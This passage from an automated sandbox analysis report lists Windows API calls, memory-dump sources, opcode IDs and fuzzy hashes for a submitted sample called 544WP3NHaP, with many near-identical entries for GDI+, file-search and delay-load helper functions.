                                                                                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008BA3DA
                                                                                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 008BA3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BitmapCreateFromGdipStream
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1918208029-0
                                                                                                                                  • Opcode ID: 64ad4ce116f6aeaaaf20536ec0bdfc73731ae4d79f66df1dc4ebd2b84f78007f
                                                                                                                                  • Instruction ID: 630e88d4e1d9b6623989b31df3316477a0a6da8ae1cf6671507c7b7c014492c0
                                                                                                                                  • Opcode Fuzzy Hash: 64ad4ce116f6aeaaaf20536ec0bdfc73731ae4d79f66df1dc4ebd2b84f78007f
                                                                                                                                  • Instruction Fuzzy Hash: 7EE0ED71500218EFCB14DF99C5416EDBBE8FF08364F10805AA856E3301E374AE44DBA2
                                                                                                                                  APIs
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008C2BAA
                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008C2BB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1660781231-0
                                                                                                                                  • Opcode ID: 0c83e5942991eab14c6738ebbe39fc5e9f795decc9b34ce1b228ac7aeeea8032
                                                                                                                                  • Instruction ID: 4fa17a9f064fd09375ffe22d83416be16677b3bd1c01bbf8de3dfc47162031df
                                                                                                                                  • Opcode Fuzzy Hash: 0c83e5942991eab14c6738ebbe39fc5e9f795decc9b34ce1b228ac7aeeea8032
                                                                                                                                  • Instruction Fuzzy Hash: 0FD0A934154300D88C147A78280AF482375FE91B78BA083DEF020C94C1EE30D881A012
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemShowWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3351165006-0
                                                                                                                                  • Opcode ID: 4967eaf6145ae4ac8749a453c7044ed508396e348c8f56603dd8ec6ef15da1ad
                                                                                                                                  • Instruction ID: e2b481a3933407563aabf44debc037b078073971bb040c9125918826fb0e5d70
                                                                                                                                  • Opcode Fuzzy Hash: 4967eaf6145ae4ac8749a453c7044ed508396e348c8f56603dd8ec6ef15da1ad
                                                                                                                                  • Instruction Fuzzy Hash: 03C0123206C200BECB410BB4DC09C2BBBACABA9712F04C908B0A5C0060C238C110EB51
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A8289
                                                                                                                                    • Part of subcall function 008A13DC: __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                    • Part of subcall function 008AA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008AA598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog$CloseFind
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2506663941-0
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                    • Part of subcall function 008A5E37: __EH_prolog.LIBCMT ref: 008A5E3C
                                                                                                                                    • Part of subcall function 008ACE40: __EH_prolog.LIBCMT ref: 008ACE45
                                                                                                                                    • Part of subcall function 008AB505: __EH_prolog.LIBCMT ref: 008AB50A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                    • Part of subcall function 008A5E37: __EH_prolog.LIBCMT ref: 008A5E3C
                                                                                                                                    • Part of subcall function 008ACE40: __EH_prolog.LIBCMT ref: 008ACE45
                                                                                                                                    • Part of subcall function 008AB505: __EH_prolog.LIBCMT ref: 008AB50A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008BB098
                                                                                                                                    • Part of subcall function 008A13DC: __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 008CACF8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190572456-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 008C3C3F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190572456-0
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A5AC2
                                                                                                                                    • Part of subcall function 008AB505: __EH_prolog.LIBCMT ref: 008AB50A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6C4
                                                                                                                                    • Part of subcall function 008AA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6F2
                                                                                                                                    • Part of subcall function 008AA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6FE
                                                                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008AA598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1464966427-0
                                                                                                                                  APIs
                                                                                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 008B0E3D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecutionStateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2211380416-0
                                                                                                                                  APIs
                                                                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 008BA62C
                                                                                                                                    • Part of subcall function 008BA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008BA3DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1915507550-0
                                                                                                                                  APIs
                                                                                                                                  • DloadProtectSection.DELAYIMP ref: 008BE5E3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DloadProtectSection
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2203082970-0
                                                                                                                                  APIs
                                                                                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,008B1B3E), ref: 008BDD92
                                                                                                                                    • Part of subcall function 008BB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                    • Part of subcall function 008BB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                    • Part of subcall function 008BB568: IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                    • Part of subcall function 008BB568: TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                    • Part of subcall function 008BB568: DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 897784432-0
                                                                                                                                  APIs
                                                                                                                                  • GetFileType.KERNELBASE(000000FF,008A97BE), ref: 008A98C8
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3081899298-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 341de65405b8077795eb94009c3b9b5dd846d643f985f0f3fc35288097fbe3e0
                                                                                                                                  • Instruction ID: ce48ce0603f73c9076c130049a5d7f200bd60d211b7fda5a36dda756beb215c1
                                                                                                                                  • Opcode Fuzzy Hash: 341de65405b8077795eb94009c3b9b5dd846d643f985f0f3fc35288097fbe3e0
                                                                                                                                  • Instruction Fuzzy Hash: 1BB092A1258245AC219452092802CB6029DE084B11330C23AF815C0780984068440432
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 47a1f56f4ad384c70764d583d728cedbe994ceabe740614588131be8e93da731
                                                                                                                                  • Instruction ID: 701bb49cb20bffc8dec0096866d94c6a5021e75b2fdce54a779afd9f638791bd
                                                                                                                                  • Opcode Fuzzy Hash: 47a1f56f4ad384c70764d583d728cedbe994ceabe740614588131be8e93da731
                                                                                                                                  • Instruction Fuzzy Hash: 3AB092A1259105AC215451092802CB6029DE486B11330C13AF815C03809840A9000472
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 8d15acd295f5bde375e37a036a3a989ca2bff33ead3fe0ccae33396877b0a020
                                                                                                                                  • Instruction ID: 2ec68979554057ddbc6ae3effda712edf6b820ce54672a825a555ec9a461dad4
                                                                                                                                  • Opcode Fuzzy Hash: 8d15acd295f5bde375e37a036a3a989ca2bff33ead3fe0ccae33396877b0a020
                                                                                                                                  • Instruction Fuzzy Hash: 38B092A1258205AC219451092802CB6029DE485B11330C23AF815C0380984069400432
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: f8daf852bd36a97ca903bb218fc132d34483de0eef664f31a5b1f0ae10ea90c2
                                                                                                                                  • Instruction ID: ef7cabb4980686ccbd04c31172d62ff3cfdb22be5bba6f40b3446d447586ec83
                                                                                                                                  • Opcode Fuzzy Hash: f8daf852bd36a97ca903bb218fc132d34483de0eef664f31a5b1f0ae10ea90c2
                                                                                                                                  • Instruction Fuzzy Hash: BDB092A1258105AC3154510A2802CB6029DF489B11330C13AF815C0380984069000432
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 656da5ad1cfd57cd48de5d24c8d9422a7e3653524047f4e114794e3a27aa3726
                                                                                                                                  • Instruction ID: 579e8e4e4b6af01509c6f231a7dc983ae7613954f2e1cbe812053a3cff489334
                                                                                                                                  • Opcode Fuzzy Hash: 656da5ad1cfd57cd48de5d24c8d9422a7e3653524047f4e114794e3a27aa3726
                                                                                                                                  • Instruction Fuzzy Hash: 22B092A1258105AC2154510A2902DB6029DE485B11330C13AF815C0380D8406A010432
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 310fd2d8249504eb2174512330f20ec099d990c560bf1c1719122293b2321535
                                                                                                                                  • Instruction ID: 3316748721466ed9fecb13a256db89fb3efa7286260563dcafc9209ab88f4474
                                                                                                                                  • Opcode Fuzzy Hash: 310fd2d8249504eb2174512330f20ec099d990c560bf1c1719122293b2321535
